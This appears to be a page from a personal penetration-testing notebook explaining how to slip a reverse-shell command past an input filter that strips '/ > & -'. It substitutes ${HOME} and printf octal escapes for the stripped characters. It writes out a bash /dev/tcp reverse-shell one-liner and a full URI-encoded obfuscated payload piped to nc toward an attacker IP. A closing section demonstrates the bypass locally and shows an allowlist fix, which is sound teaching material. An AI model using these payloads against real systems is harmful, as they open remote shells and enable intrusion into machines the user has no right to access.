refabr1k's Pentest Notebook
Using ENV to escape Bad Characters

The characters '/ > & -' are stripped from our input before it is executed, but we still want a reverse TCP one-liner. We can work around the missing characters with the following methods.


Our reverse shell command /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1 will not execute successfully because the / characters are being stripped. How do we get around this?

First, check whether the environment contains a variable whose value we can reuse. For example, the / character is being stripped while we try to get a reverse shell, and the target's environment looks like this:

# Env contains a variable
OLDPWD=/
HOME=/
PHP_FCGI_MAX_REQUESTS=500
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin
LANG=en_US.ISO8859-1
PHP_FCGI_CHILDREN=1
PWD=/var/db/rrd

Looking at the Env values above, ${HOME} expands to /, so every / in the payload can be replaced with ${HOME}.

On non-BSD systems the '$LANG' variable can also be formatted as follows:

If the OS is BSD, we cannot format the variable like that, so we use printf with octal escapes instead.

To test this, we print out the reverse shell command with the bad characters substituted. Each printf call rebuilds one character from its octal code:

# - character (octal 55)
a=$(printf "\55")

# / character (octal 57)
b=$(printf "\57")

# & character (octal 46)
c=$(printf "\46")

# > character (octal 76)
d=$(printf "\76")

In this example the full payload is sent URI-encoded, so the space characters become '+'. The test payload now looks like this:

a=$(printf+"\55");b=$(printf+"\57");c=$(printf+"\46");d=$(printf+"\76");echo+${b}bin${b}bash+${a}i+${d}${c}+${b}dev${b}tcp${b}10.10.14.39${b}443+0${d}${c}1|nc+10.10.14.39+443

On the target this expands to the reverse shell command that was previously being mangled, confirming that the substituted characters survive the filter.
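The mechanism above, rebuilt as a small added example that is not from refabr1k's notebook, so a defender can see both sides locally: the constructed naive_filter mimics a filter that deletes '/ > & -', octal_char shows how printf rebuilds a character from its octal code, expand_filtered shows what the shell produces once the filtered text is evaluated, and allowlist_ok is the check that actually stops the trick, because it accepts only a plain token instead of trying to blocklist characters. Every string and function name here is constructed for the demo.

```shell
# Added example, not code from the original notebook.
# All values below are constructed for the demonstration.

# Mimics the naive filter described on the page: delete / > & -
naive_filter() {
    printf '%s' "$1" | tr -d '/>&-'
}

# Rebuild one character from its octal code, as the page's
# $(printf "\57") trick does. 57 -> /  55 -> -  76 -> >  46 -> &
octal_char() {
    printf "\\$1"
}

# Constructed input: contains none of the four filtered characters,
# only printf calls that the shell will expand later.
OBFUSCATED='$(printf "\57")bin$(printf "\57")id $(printf "\55")u'

# What the target shell produces when it evaluates the filtered text.
# Only ever called on the constructed string above.
expand_filtered() {
    eval "printf '%s' \"$1\""
}

# The fix: an allowlist. Accept only a plain token, reject everything else.
# Returns 0 when the value is acceptable, 1 otherwise.
allowlist_ok() {
    case "$1" in
        '') return 1 ;;
        *[!A-Za-z0-9_.]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Stand-alone run: filter result, expansion result, allowlist verdict
filtered=$(naive_filter "$OBFUSCATED")
printf 'after filter : %s\n' "$filtered"
printf 'after expand : %s\n' "$(expand_filtered "$filtered")"
if allowlist_ok "$OBFUSCATED"; then
    echo 'allowlist    : accepted'
else
    echo 'allowlist    : rejected'
fi
```

The filter leaves the obfuscated string untouched because there is nothing to delete, yet the shell later turns it into /bin/id -u. The allowlist rejects it on the first $ it sees, which is the point: once input reaches a shell, deleting individual characters is not a mitigation; constrain the input to the exact shape you expect, or better, do not pass it to a shell at all.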